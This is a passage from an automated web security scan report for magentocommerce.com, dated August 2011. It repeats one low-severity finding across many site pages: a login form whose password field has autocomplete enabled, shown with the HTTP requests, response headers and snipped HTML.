Set-Cookie: exp_last_activity=1313176165; expires=Sat, 11-Aug-2012 15:09:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Fscreencasts%2Fupsells%2Fview%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A4%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:25 GMT
Content-Length: 33171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.96. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/working-with-paypal/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screencasts/working-with-paypal/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176036; expires=Sat, 11-Aug-2012 15:07:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A44%3A%22%2Fmedia%2Fscreencasts%2Fworking-with-paypal%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:16 GMT
Content-Length: 40839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.97. http://www.magentocommerce.com/media/screenshots  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screenshots

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screenshots HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175862; expires=Sat, 11-Aug-2012 15:04:22 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreenshots%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:22 GMT
Content-Length: 36191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.98. http://www.magentocommerce.com/media/videos  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/videos

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/videos HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175890; expires=Sat, 11-Aug-2012 15:04:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fmedia%2Fvideos%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 37445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.99. http://www.magentocommerce.com/media/videos/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/videos/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/videos/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176188; expires=Sat, 11-Aug-2012 15:09:48 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fmedia%2Fvideos%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:48 GMT
Content-Length: 37445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.100. http://www.magentocommerce.com/media/webinars  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/webinars

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/webinars HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175869; expires=Sat, 11-Aug-2012 15:04:29 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fmedia%2Fwebinars%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:30 GMT
Content-Length: 178679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.101. http://www.magentocommerce.com/media/webinars/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/webinars/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/webinars/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175893; expires=Sat, 11-Aug-2012 15:04:53 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fmedia%2Fwebinars%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:54 GMT
Content-Length: 178679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.102. http://www.magentocommerce.com/partners/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /partners/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170940; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A2%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.9.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171052; expires=Sat, 11-Aug-2012 13:44:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:12 GMT
Content-Length: 38025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.103. http://www.magentocommerce.com/partners/find/bronze-solution/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/bronze-solution/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /partners/find/bronze-solution/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176342; expires=Sat, 11-Aug-2012 15:12:22 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fpartners%2Ffind%2Fbronze-solution%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:22 GMT
Content-Length: 65854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.104. http://www.magentocommerce.com/partners/find/hosting-partners/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/hosting-partners/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /partners/find/hosting-partners/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176345; expires=Sat, 11-Aug-2012 15:12:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fpartners%2Ffind%2Fhosting-partners%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:25 GMT
Content-Length: 51575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.105. http://www.magentocommerce.com/partners/find/industry-partners/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/industry-partners/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /partners/find/industry-partners/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176334; expires=Sat, 11-Aug-2012 15:12:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fpartners%2Ffind%2Findustry-partners%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:15 GMT
Content-Length: 54897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.106. http://www.magentocommerce.com/partners/find/solution-partners/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/solution-partners/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /partners/find/solution-partners/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176347; expires=Sat, 11-Aug-2012 15:12:27 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fpartners%2Ffind%2Fsolution-partners%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:27 GMT
Content-Length: 63005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.107. http://www.magentocommerce.com/partners/hosting-partners  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/hosting-partners

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /partners/hosting-partners HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176331; expires=Sat, 11-Aug-2012 15:12:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fpartners%2Fhosting%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:11 GMT
Content-Length: 37154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.108. http://www.magentocommerce.com/partners/industry-partners  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/industry-partners

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /partners/industry-partners HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176341; expires=Sat, 11-Aug-2012 15:12:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fpartners%2Findustry%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:22 GMT
Content-Length: 38023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.109. http://www.magentocommerce.com/partners/solution-partners  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/solution-partners

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /partners/solution-partners HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176334; expires=Sat, 11-Aug-2012 15:12:14 GMT; path=/; domain=magentocommerce.com
